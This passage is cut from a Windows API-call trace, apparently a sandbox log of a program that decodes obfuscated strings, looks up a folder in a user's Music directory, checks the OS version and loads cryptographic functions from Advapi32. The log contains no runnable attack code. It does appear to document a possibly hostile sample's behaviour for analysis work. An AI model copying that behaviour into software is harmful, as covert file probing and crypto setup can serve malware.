returned 1 [0207.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0207.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0207.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0207.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0207.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0207.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0207.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0207.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0207.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0207.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0207.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0207.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0207.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0207.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0207.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0207.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0207.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0207.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0207.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0207.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0207.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0207.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0207.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0207.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0207.029] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0207.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0207.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0207.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0207.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0207.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0207.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0207.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0207.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0207.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0207.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0207.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0207.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0207.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0207.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0207.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0207.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0207.030] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0207.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0207.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0207.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0207.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0207.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0207.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0207.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0207.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0207.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0207.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0207.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0207.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0207.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0207.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0207.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0207.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0207.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0207.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0207.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0207.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0207.031] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\orL7CLboBO", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29e34850, ftCreationTime.dwHighDateTime=0x1d5d080, ftLastAccessTime.dwLowDateTime=0x34635a50, ftLastAccessTime.dwHighDateTime=0x1d5cf99, ftLastWriteTime.dwLowDateTime=0x34635a50, ftLastWriteTime.dwHighDateTime=0x1d5cf99, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="orL7CLboBO", cAlternateFileName="ORL7CL~1")) returned 0x9e2078 [0207.031] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0207.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0207.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0207.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0207.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0207.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0207.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0207.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0207.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0207.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0207.031] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0207.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0207.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0207.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0207.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0207.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0207.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0207.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0207.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0207.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0207.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0207.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0207.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0207.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0207.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0207.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0207.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0207.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0207.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0207.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0207.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0207.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0207.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0207.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0207.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0207.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0207.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0207.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0207.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0207.033] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.033] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0207.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0207.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0207.033] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0207.033] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0207.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0207.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0207.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0207.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0207.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0207.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0207.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0207.033] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0207.033] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.033] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0207.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0207.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0207.033] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0207.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0207.033] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0207.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0207.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0207.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0207.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0207.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0207.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0207.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0207.034] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0207.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0207.034] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0207.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0207.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0207.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0207.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0207.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0207.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0207.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0207.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0207.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0207.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0207.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0207.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0207.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0207.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0207.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0207.034] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0207.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0207.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0207.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0207.034] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0207.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0207.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0207.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0207.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0207.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0207.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0207.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0207.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0207.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0207.035] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0207.035] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.035] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0207.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0207.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0207.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0207.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0207.035] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0207.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0207.035] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0207.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0207.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0207.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0207.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0207.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0207.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0207.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0207.036] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0207.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0207.036] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0207.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0207.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0207.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0207.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0207.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0207.036] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0207.036] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.036] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.036] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.036] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0207.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0207.036] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.036] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0207.036] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0207.036] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0207.036] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0207.036] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0207.036] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0207.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7120, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0207.037] 